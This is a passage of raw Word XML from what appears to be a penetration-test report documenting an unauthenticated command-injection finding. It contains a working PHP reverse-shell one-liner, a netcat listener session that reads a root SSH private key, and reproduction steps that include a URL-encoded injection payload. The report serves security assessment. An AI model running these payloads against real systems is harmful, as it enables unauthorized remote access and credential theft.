      <w:tr w:rsidR="00F66181" w14:paraId="5D4DAE09" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="18DFD07B" w14:textId="3936E52B" w:rsidR="00F66181" w:rsidRDefault="00AC67FD" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -r '$sock=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>fsockopen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"10.10.0.10",31337);`/bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3`;'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D274A07" w14:textId="6AD31040" w:rsidR="00F66181" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHP Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAA83D" w14:textId="405547A9" w:rsidR="00AC67FD" w:rsidRPr="00F66181" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
      <w:r>
        <w:t xml:space="preserve">After the assessment team sent the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> request to the web server, their listener caught a connection back from </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC67FD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. With the </w:t>
      </w:r>
      <w:r w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user access, the team was able to access sensitive information on the server and run additional commands. The below figure shows the listener catching the shell and the assessment team validating their access.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC67FD" w14:paraId="0E161873" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="507793C4" w14:textId="7732C91D" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nlvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 31337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="166C9D7F" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>listening on [any] 31337 ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE2DC10" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">connect to [10.10.0.10] from (UNKNOWN) [10.10.0.66] </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>56152</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1D21443B" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="20434CEC" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>www-data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74BBC976" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1B826725" w14:textId="40C0996E" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/var/www/html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5914D77D" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="0055639E" w:rsidRDefault="004956AA" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A18BF85" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="0055639E" w:rsidRDefault="004956AA" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>id_rsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="527832A6" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="0055639E" w:rsidRDefault="004956AA" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-----BEGIN RSA PRIVATE KEY-----</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B87F3B8" w14:textId="0B1928CD" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="004956AA" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MIIEpQIBAAK</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2044E51C" w14:textId="6D8B13EA" w:rsidR="004956AA" w:rsidRPr="004956AA" w:rsidRDefault="004956AA" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="210A0190" w14:textId="246B4429" w:rsidR="00AC67FD" w:rsidRPr="007B579A" w:rsidRDefault="007B579A" w:rsidP="007B579A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>www-data User Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23A306" w14:textId="77777777" w:rsidR="0055639E" w:rsidRDefault="0055639E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5C56B" w14:textId="4C3DDD14" w:rsidR="00F66181" w:rsidRPr="003C17E2" w:rsidRDefault="00AC67FD" w:rsidP="003C17E2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This exploit can be performed by a</w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> remote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacker without authentication to the web application</w:t>
      </w:r>
      <w:r w:rsidR="00C566FB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> allowing them to easily gain a shell in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve">user context. Because the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> user has access to the SSH Private Keys in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>.backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> directory, an attacker who exploited this vulnerability would be able quickly gain root access </w:t>
      </w:r>
      <w:r w:rsidR="00C566FB">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528193E" w14:textId="2E5D39AA" w:rsidR="007B579A" w:rsidRDefault="007B579A" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DCE774" w14:textId="5803AE12" w:rsidR="007B579A" w:rsidRDefault="007B579A" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Write a command that will connect back to a listening machine.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Ex: </w:t>
      </w:r>
      <w:r w:rsidR="005D3AC9">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r '$sock=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>fsockopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ListeningMachineIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>PortNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>);`/bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3`;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C81C355" w14:textId="62C7C1E7" w:rsidR="007B579A" w:rsidRPr="005D3AC9" w:rsidRDefault="005D3AC9" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Escape the shell command by appending special characters on each side of the command.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ex:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r '$sock=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>fsockopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>("$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ListeningMachineIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>",$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>PortNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>);`/bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3`;'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>;)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075537AF" w14:textId="1029892E" w:rsidR="005D3AC9" w:rsidRDefault="005D3AC9" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>URL Encode the payload and append to a request URL parameter value</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ex:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>GET /?name=test&amp;email=test</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'%20%26%20php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.0.10%22%2C31337%29%3B%60%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%60%3B%27%3b%29%23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD519B2" w14:textId="12C1520A" w:rsidR="005D3AC9" w:rsidRDefault="005D3AC9" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start a listener on your machine.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ex:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
